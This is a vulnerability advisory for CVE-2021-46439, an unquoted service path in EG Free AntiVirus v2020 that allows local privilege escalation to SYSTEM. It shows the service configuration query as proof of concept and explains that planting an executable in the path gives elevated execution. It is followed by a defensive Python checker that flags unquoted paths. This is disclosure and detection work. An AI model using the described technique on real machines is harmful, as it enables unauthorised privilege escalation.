# Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation)
# Date: 24/01/2022
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: http://www.egsoftweb.in/index.aspx
# Software Link: http://www.egsoftweb.in/OurProduct_Readmore.aspx?id=6
# Version: 2020
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46439

-------------
Description:
-------------
EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with an unquoted service path. Since this service is running as SYSTEM, it creates a local privilege escalation vulnerability. To properly exploit this vulnerability, a local attacker must insert an executable in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges.

------------------
Proof of Concept:
------------------
C:\Users\shah>sc qc "WinSEGAV AutoConfig"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WinSEGAV AutoConfig
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\EGSoftWeb\EG Anti Virus\egavser.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Service For EG Free AntiVirus
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Best regards,
Shahrukh Iqbal Mirza.
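
A defender-side check for the condition shown in the proof of concept, as an added example that is not part of the original advisory: it parses `sc qc` output and flags a BINARY_PATH_NAME whose executable path contains spaces but is not quoted, ignoring spaces that only precede arguments. The sample is trimmed from the output above; the function names and the extension list are assumptions of this example.

```python
import re

# Constructed sample: trimmed from the `sc qc` output shown in the advisory.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WinSEGAV AutoConfig
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\EGSoftWeb\EG Anti Virus\egavser.exe
        SERVICE_START_NAME : LocalSystem
"""

# Executable part of a command line, then any arguments that follow it.
# The extension list is an assumption of this example.
EXE_RE = re.compile(r"^(.*?\.(?:exe|com|bat|cmd))(?=\s|$)(.*)$", re.I)

def parse_sc_qc(text):
    """Return the 'KEY : value' fields of `sc qc` output as a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")  # split at the first colon only
        if sep and re.fullmatch(r"[A-Z_]+", key.strip()):
            fields[key.strip()] = value.strip()
    return fields

def split_command(binary_path):
    """Split BINARY_PATH_NAME into (executable, arguments)."""
    path = binary_path.strip()
    m = EXE_RE.match(path)
    return (m.group(1), m.group(2)) if m else (path, "")

def is_unquoted_with_spaces(binary_path):
    """True when the executable path contains a space and is not quoted.
    Spaces that only separate arguments (svchost.exe -k ...) do not count."""
    if binary_path.strip().startswith('"'):
        return False
    exe, _ = split_command(binary_path)
    return " " in exe

def audit(text):
    """Report one service: name, account, finding, and the quoted form."""
    f = parse_sc_qc(text)
    path = f.get("BINARY_PATH_NAME", "")
    flagged = is_unquoted_with_spaces(path)
    exe, args = split_command(path)
    return {"service": f.get("SERVICE_NAME"),
            "account": f.get("SERVICE_START_NAME"),
            "unquoted": flagged,
            "quoted_path": f'"{exe}"{args}' if flagged else path}

if __name__ == "__main__":
    print(audit(SC_QC_OUTPUT))
```

The `quoted_path` value is the form the service's ImagePath should have once the path is quoted.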